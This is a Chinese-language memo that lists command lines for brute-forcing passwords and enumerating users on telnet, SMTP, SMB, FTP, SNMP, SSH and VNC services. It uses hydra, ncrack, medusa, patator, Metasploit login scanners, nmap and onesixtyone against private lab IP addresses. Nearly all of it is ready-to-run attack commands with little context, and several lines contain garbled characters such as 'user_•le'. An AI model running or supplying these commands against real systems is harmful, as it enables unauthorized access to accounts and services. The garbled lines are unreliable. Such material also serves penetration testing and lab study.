hydra –L /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106 telnet
-L
指定用户名列表
-P
指定密码列表
ncrack –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.106:23
-U
指定用户名列表
-P
指定密码列表
patator telnet_login host=192.168.1.106 inputs=‘FILE0\nFILE1’ 0=/root/Desktop/user.txt 1=/root/Desktop/pass.txt persistent=0 prompt_re=‘Username: | Password:’
use auxiliary/scanner/telnet/telnet_login
msf exploit (telnet_login)>set rhosts 192.168.1.106 (IP of Remote Host)
msf exploit (telnet_login)>set user_•le /root/Desktop/user txt
msf exploit (telnet_login)>set pass_•le /root/Desktop/pass.txt
msf exploit (telnet_login)>set stop_on_success true
msf exploit (telnet_login)> exploit
连接 25 端口:
telnet 192.168.1.107 25
枚举用户,结果返回 550 则表示用户不存在,结果返回 250,251,252 表示用户是有效的:
vrfy raj@mail.lab.ignite
use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 192.168.1.107
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/user.txt
msf auxiliary(smtp_enum) > exploit
smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107
-M
指定使用哪种方式枚举,比如 EXPN, VRFY 或 RCPT
-U
指定用户名列表
-t
指定目标主机 IP
指定邮箱后缀,用户名列表只需要名字即可,使用参数 -D
:
smtp-user-enum -M VRFY -D mail.ignite.lab -u raj -t 192.168.1.107
ismtp -h 192.168.1.107:25 -e /root/Desktop/email.txt
hydra –L/root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 smb
ncrack –u /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 –p 445
medusa -h 192.168.1.118 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M smbnt
use auxiliary/scanner/smb/smb_login
msf exploit (smb_login)>set rhost 192.168.1.118
msf exploit (smb_login)>set user_•le /root/Desktop/user.txt
msf exploit (smb_login)>set pass_•le /root/Desktop/pass.txt
msf exploit (smb_login)>set stop_on_success true
msf exploit (smb_login)>exploit
hydra –L/root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103 ftp
ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.1.103:21
Medusa -h 192.168.1.103 –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M ftp
patator ftp_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/ftp/ftp_login
msf exploit (ftp_login)>set rhosts 192.168.1.103 (IP of Remote Host)
msf exploit (ftp_login)>set user_•le /root/Desktop/user.txt
msf exploit (ftp_login)>set userpass_•le /root/Desktop/pass.txt
msf exploit (ftp_login)>set stop_on_success true
msf exploit (ftp_login)> exploit
hydra -P /root/Desktop/pass.txt 192.168.1.125 snmp
medusa -M snmp –h 192.168.1.125 –u ignite –P /root/Desktop/pass.txt
use auxiliary/scanner/snmp/snmp_login
msf auxiliary(scanner/snmp/snmp_login)> set rhosts 192.168.1.125 (IP of Remote Host)
msf auxiliary(scanner/snmp/snmp_login)> set pass_•le /root/Desktop/pass.txt
msf auxiliary(scanner/snmp/snmp_login)> set stop_on_success true
msf auxiliary(scanner/snmp/snmp_login)> run
nmap –sU –p 161 –n –script snmp-brute 192.168.1.125 –script-args snmp- brute.communitiesdb=/root/Desktop/pass.txt
onesixtyone 192.168.1.125 –c /root/Desktop/pass.txt
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.103 ssh
medusa -h 192.168.1.103 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M ssh
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt 192.168.1.103:22
patator ssh_login host=192.168.1.103 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/ssh/ssh_login
msf exploit (ssh_login)>set rhosts 192.168.1.103 (IP of Remote Host)
msf exploit (ssh_login)>set user_•le /root/Desktop/user.txt
msf exploit (ssh_login)>set pass_•le /root/Desktop/pass.txt
msf exploit (ssh_login)>exploit
Hydra-s 5900 –P /root/Desktop/pass.txt –t 16 192.168.0.6 vnc
use auxiliary/scanner/vnc/vnc_login
msf auxiliary(scanner/vnc/vnc_login) > set rhosts 192.168.0.6
msf auxiliary(scanner/vnc/vnc_login) > set pass_•le /root/Desktop/pass.txt
msf auxiliary(scanner/vnc/vnc_login) > run
patator vnc_login host=192.168.0.6 password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!=‘Authentication failure’ –max-reteries 0 –x quit:code=0
Medusa -h 192.168.0.6 –u root–P /root/Desktop/pass.txt –M vnc
ncrack –v –U /root/Desktop/user.txt–P /root/Desktop/pass.txt 192.168.0.6:5900
整体来看,这些工具可以对除了以上几种服务攻击之外,还可以对其他更多的服务进行攻击尝试,比如数据库服务中的 mssql、mysql、oracle 等,差异仅仅在于参数不同,这里主要做个备忘,以备不时之需,没啥技术含量,仅供参考。